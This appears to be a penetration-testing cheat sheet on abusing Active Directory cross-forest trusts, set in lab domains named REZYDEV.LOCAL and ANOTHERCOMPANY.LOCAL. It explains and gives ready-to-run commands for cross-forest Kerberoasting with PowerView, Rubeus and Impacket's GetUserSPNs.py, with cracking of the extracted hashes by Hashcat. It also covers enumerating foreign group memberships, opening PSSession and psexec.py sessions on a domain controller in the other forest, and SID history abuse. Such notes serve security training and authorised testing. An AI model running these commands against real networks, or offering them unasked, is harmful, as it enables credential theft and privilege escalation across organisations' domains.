Cross-Forest Trust Abuse
Windows
Cross-Forest Kerberoasting
Cross-Forest Kerberoasting is an attack that exploits Kerberos authentication across Active Directory forest trusts. An attacker first enumerates Service Principal Names (SPNs) in the trusted forest using tools like GetUserSPNs.py. Once SPNs are identified, the attacker requests Kerberos Ticket Granting Service (TGS) tickets for these accounts. Since these tickets are encrypted with the service account’s NTLM hash, they can be extracted and cracked offline using tools like Hashcat to reveal plaintext credentials. This attack is particularly dangerous because it allows privilege escalation across forest boundaries without requiring direct domain admin access.
We can perform both Kerberoasting and ASREPRoasting in a cross-forest environment if the trust direction is bidirectional.
Enumerating
## [PowerView]
## Enumerating Accounts for SPNs set Using Get-DomainUser
Get-DomainUser -SPN -Domain ANOTHERCOMPANY.LOCAL | select SamAccountName
## Above command lists kerberoastable accounts, we can look more about that user
Get-DomainUser -Domain ANOTHERCOMPANY.LOCAL -Identity babitaji | select samaccountname,memberof
Kerberoasting Across Trust
Rubeus
.\Rubeus.exe kerberoast /domain:ANOTHERCOMPANY.LOCAL /user:babitaji /nowrap
## Crack the hash with hashcat.
Admin Password Re-Use & Group Membership
In a bidirectional forest trust, admins often manage both domains, leading to potential password reuse. If we compromise Domain A and obtain credentials for a privileged user, the same credentials might work in Domain B. Additionally, admins from Domain A may have group memberships in Domain B, granting them elevated privileges. Taking over such an admin in Domain A could provide full administrative access to Domain B.
## Enumerate groups with users that belong to foreign group membership
Get-DomainForeignGroupMember -Domain ANOTHERCOMPANY.LOCAL
## Convert 'MemberName' from above output to readable form
Convert-SidToName <MEMBER-NAME>
PSSession Connection
## Verify access
Enter-PSSession -ComputerName DC03.ANOTHERCOMPANY.LOCAL -Credential REZYDEV\administrator
SID History Abuse
SID History can be exploited in a forest trust if SID Filtering is not enabled. When a user is migrated from rezydev.local to anothercompany.local, their old SID can be carried over. If an admin SID from rezydev.local is added to their SID history, they will retain admin privileges in rezydev.local even after moving to anothercompany.local. This allows them to access resources in the old domain while being a member of the new one.
Linux
Kerberoasting
## GetUserSPNs.py
python3 /path/to/GetUserSPNs.py -request -target-domain ANOTHERCOMPANY.LOCAL REZYDEV.LOCAL/jethalal
## Note: In above command, ANOTHERCOMPANY.LOCAL is target forest we are abusing and
## we know credentials of user jethalal in REZYDEV.LOCAL domain.
Foreign Group Membership
To hunt for foreign group memberships in an environment from a Linux attack host, we can use BloodHound-python to collect data and import the resulting .json file into BloodHound for enumeration. In cases involving a bidirectional forest trust relationship, a privileged user from Domain A may be a member of the Built-in Administrators group in Domain B, potentially granting elevated access across domains.
Users with Foreign Domain Group Membership under the Analysis tab.
Use use command psexec.py ANOTHERCOMPANY.LOCAL/babitaji@dc03.rezydev.local -target-ip 10.10.10.50 to authenticate to dc located at another forest .